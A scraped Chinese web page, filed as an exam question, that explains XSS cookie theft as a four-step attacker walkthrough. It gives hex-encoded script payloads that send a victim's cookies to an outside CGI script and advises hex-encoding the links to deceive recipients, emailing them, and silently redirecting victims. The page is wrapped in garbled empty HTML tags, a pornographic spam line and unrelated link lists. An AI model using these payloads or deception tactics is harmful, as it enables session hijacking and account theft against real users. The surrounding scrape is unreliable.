1. <tt id="5hhch"><source id="5hhch"></source></tt>
    1. <xmp id="5hhch"></xmp>

  2. <xmp id="5hhch"><rt id="5hhch"></rt></xmp>

    <rp id="5hhch"></rp>
        <dfn id="5hhch"></dfn>

      1. 解釋一下XSS cookie盜竊是什么意思

        時間:2023-02-10 14:09:25 筆試題目 我要投稿
        • 相關推薦

        解釋一下XSS cookie盜竊是什么意思

          根據作為攻擊對象的Web程序,下面某些變量和插入位置可能需要進行調整。要注意這只是攻擊方法的一個例子。在這個例子中,我們將利用腳本“a.php”中的 “viriable”變量中的跨站腳本漏洞,通過正常請求進行攻擊。這是跨站腳本攻擊最常見的形式。

          第一步: 鎖定目標

          當你找到某個Web程序存在XSS漏洞之后,檢查一下它是否設置了cookie。如果在該網站的任何地方設置了cookie,那么就可以從用戶那里盜取它。

          第二步: 測試

          不同的攻擊方式將產生不同的XSS漏洞,所以應適當進行測試以使得輸出結果看起來像是正常的。某些惡意腳本插入之后會破壞輸出的頁面。(為欺騙用戶,輸出結果非常重要,因此攻擊者有必要調整攻擊代碼使輸出看起來正常。)

          下一步你需要在鏈接至包含XSS漏洞的頁面的URL中插入 Javascript(或其他客戶端腳本)。下面列出了一些經常用于測試XSS漏洞的鏈接。當用戶點擊這些鏈接時,用戶的cookie獎被發送到 cgisecurity.com/cgi-bin/cookie.cgi 并被顯示。如果你看到顯示結果中包含了cookie信息,說明可能可以劫持該用戶的賬戶。

          盜取Cookie的Javascript示例。使用方法如下。

          ASCII用法

          http://host/a.php?variable=”>

          十六進制用法

          http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f

          %63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67

          %69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f

          %6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

          注意: 每種用法都先寫為ASCII,再寫成十六進制以便復制粘貼。

          1. “>

          HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e

          %6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65

          %63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f

          %63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

          2.

          HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f

          %63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72

          %69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b

          %69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e

          3. >

          HEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c

          %6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75

          %72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f

          %6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65 %3c%2f%73%63%72%69%70%74%3e

          第三步: 執行XSS

          將做好的URL通過電子郵件或其他方式發送出去。注意如果你直接將URL發送給其他人(通過電子郵件、即時通訊軟件或其他方式),你應當將其進行十六進制編碼,因為這些URL一眼便可看出包含惡意代碼,但經過十六進制編碼之后就可以欺騙大部分人。

          第四步: 處理收集到的信息

          一旦用戶點擊了你的URL,相應數據就會被發送到你的CGI腳本中。這樣你就獲得了 cookie信息,然后你可以利用Websleuth之類的工具來檢查是否能盜取那個賬戶。

          在上面的例子中,我們僅僅將用戶帶到了 cookie.cgi頁面上。如果你有時間,你可以在CGI中將用戶重定向到原來的頁面上,即可在用戶不知不覺之中盜取信息。

          某些電子郵件程序在打開附件時會自動執行附件中的Javascript代碼。即使像Hotmail這樣的大型網站也是如此,不過它對附件內容作了許多過濾以避免cookie被盜。

        【解釋一下XSS cookie盜竊是什么意思】相關文章:

        清明的意思是什么04-04

        論民事盜竊與刑事盜竊的區分06-06

        3.15是什么意思07-26

        諺語是什么意思?07-23

        諺語是什么意思11-08

        小年是什么意思01-16

        入伏是什么意思07-07

        尾牙是什么意思10-20

        小雪是什么意思?07-17

        国产高潮无套免费视频_久久九九兔免费精品6_99精品热6080YY久久_国产91久久久久久无码

        1. <tt id="5hhch"><source id="5hhch"></source></tt>
          1. <xmp id="5hhch"></xmp>

        2. <xmp id="5hhch"><rt id="5hhch"></rt></xmp>

          <rp id="5hhch"></rp>
              <dfn id="5hhch"></dfn>